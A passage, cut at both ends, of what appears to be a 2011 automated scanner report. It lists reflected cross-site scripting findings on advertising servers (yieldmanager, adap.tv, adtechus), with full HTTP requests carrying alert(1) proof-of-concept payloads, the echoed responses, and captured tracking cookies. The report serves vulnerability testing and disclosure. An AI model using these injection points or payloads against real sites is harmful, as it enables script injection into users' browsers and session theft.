'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:23 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:49:23 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&b090d"><script>alert(1)</script>b3e751e2978=1&s=806254&_salt=2506030954&t=2" target="_parent">
...[SNIP]...

3.33. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8994d"-alert(1)-"ce7be5c493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254&8994d"-alert(1)-"ce7be5c493=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:49:26 GMT
Pragma: no-cache
Content-Length: 4673
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?8994d"-alert(1)-"ce7be5c493=1&Z=728x90&s=806254&_salt=2462607345";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.34. http://ads.adap.tv/beacons [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adap.tv
Path:	/beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a1f27<script>alert(1)</script>021458ba7c7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1311396514352a1f27<script>alert(1)</script>021458ba7c7 HTTP/1.1
Host: ads.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-05-10+07%3A22%3A29"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A45";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:25 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 792

jsonp1311396514352a1f27<script>alert(1)</script>021458ba7c7({
"beacons":["http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pix04.revsci.net/A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26t
...[SNIP]...

3.35. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The value of the AdId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1753f"-alert(1)-"39746e769c6 was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?1753f"-alert(1)-"39746e769c6 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 2220
Set-Cookie: 28969=ADCAD0B8.1C14A0.1.14FCEB.2.0.4E2AD12F.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:31 GMT;domain=adserver.adtechus.com;path=/

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
if (!__bCodeFlushed) {
var span = parent.document.createElement("SPAN"
...[SNIP]...
edia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?1753f"-alert(1)-"39746e769c6http://www.smiletrain.org?s_src=BANNER_BostonGlobe12&utm_source=Boston&utm_campaign=valueadd&utm_medium=display\" target=\"_blank\">
...[SNIP]...

3.36. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8501"-alert(1)-"733d4dc846b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?&f8501"-alert(1)-"733d4dc846b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
